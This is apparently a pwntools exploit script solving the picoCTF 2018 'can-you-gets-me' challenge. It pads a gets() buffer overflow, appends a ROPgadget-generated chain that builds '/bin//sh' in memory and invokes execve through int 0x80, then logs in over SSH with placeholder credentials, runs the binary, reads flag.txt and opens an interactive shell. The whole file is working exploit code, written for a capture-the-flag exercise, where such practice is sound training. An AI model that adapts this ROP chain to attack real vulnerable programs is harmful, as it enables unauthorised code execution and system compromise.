#!/usr/bin/env python2
# execve generated by ROPgadget
from pwn import *
from struct import pack

USER = 'my_user'
PASSWD = 'my_passwd'

# Padding goes here
p = ''

p += pack('<I', 0x0806f19a) # pop edx ; ret
p += pack('<I', 0x080ea060) # @ .data
p += pack('<I', 0x080b84d6) # pop eax ; ret
p += '/bin'
p += pack('<I', 0x08054b4b) # mov dword ptr [edx], eax ; ret
p += pack('<I', 0x0806f19a) # pop edx ; ret
p += pack('<I', 0x080ea064) # @ .data + 4
p += pack('<I', 0x080b84d6) # pop eax ; ret
p += '//sh'
p += pack('<I', 0x08054b4b) # mov dword ptr [edx], eax ; ret
p += pack('<I', 0x0806f19a) # pop edx ; ret
p += pack('<I', 0x080ea068) # @ .data + 8
p += pack('<I', 0x08049473) # xor eax, eax ; ret
p += pack('<I', 0x08054b4b) # mov dword ptr [edx], eax ; ret
p += pack('<I', 0x080481c9) # pop ebx ; ret
p += pack('<I', 0x080ea060) # @ .data
p += pack('<I', 0x080dece1) # pop ecx ; ret
p += pack('<I', 0x080ea068) # @ .data + 8
p += pack('<I', 0x0806f19a) # pop edx ; ret
p += pack('<I', 0x080ea068) # @ .data + 8
p += pack('<I', 0x08049473) # xor eax, eax ; ret
p += pack('<I', 0x0807ab7f) # inc eax ; ret
p += pack('<I', 0x0807ab7f) # inc eax ; ret
p += pack('<I', 0x0807ab7f) # inc eax ; ret
p += pack('<I', 0x0807ab7f) # inc eax ; ret
p += pack('<I', 0x0807ab7f) # inc eax ; ret
p += pack('<I', 0x0807ab7f) # inc eax ; ret
p += pack('<I', 0x0807ab7f) # inc eax ; ret
p += pack('<I', 0x0807ab7f) # inc eax ; ret
p += pack('<I', 0x0807ab7f) # inc eax ; ret
p += pack('<I', 0x0807ab7f) # inc eax ; ret
p += pack('<I', 0x0807ab7f) # inc eax ; ret
p += pack('<I', 0x0806cd95) # int 0x80

padding = "A"*28
payload = padding + p

sh = ssh(host = '2018shell3.picoctf.com', user = USER, password = PASSWD)
r = sh.run('/problems/can-you-gets-me_2_da0270478f868f229487e59ee4a8cf40/gets')
print r.recv()
print r.sendline(payload)
print r.sendline('cat flag.txt')
r.interactive()
r.close()
sh.close()
